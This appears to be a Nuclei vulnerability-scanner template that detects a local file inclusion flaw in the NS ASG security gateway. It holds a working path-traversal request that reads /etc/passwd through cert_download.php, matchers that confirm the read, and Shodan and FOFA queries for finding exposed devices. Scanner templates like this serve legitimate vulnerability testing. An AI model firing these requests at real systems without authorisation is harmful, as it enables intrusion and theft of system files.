id: nsasg-arbitrary-file-read info: name: NS ASG - Local File Inclusion author: pikpikcu,ritikchaddha severity: high description: NS ASG is vulnerable to local file inclusion. reference: - https://zhuanlan.zhihu.com/p/368054963 - http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md metadata: max-request: 2 fofa-query: app="网康科技-NS-ASG安全网关" shodan-query: http.title:“NS-ASG” classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 tags: nsasg,lfi http: - method: GET path: - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd" - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" stop-at-first-match: true matchers-condition: or matchers: - type: regex regex: - "root:.*:0:0:" - type: word part: body words: - "$certfile" - "application/pdf" condition: and # Enhanced by mp on 2022/08/03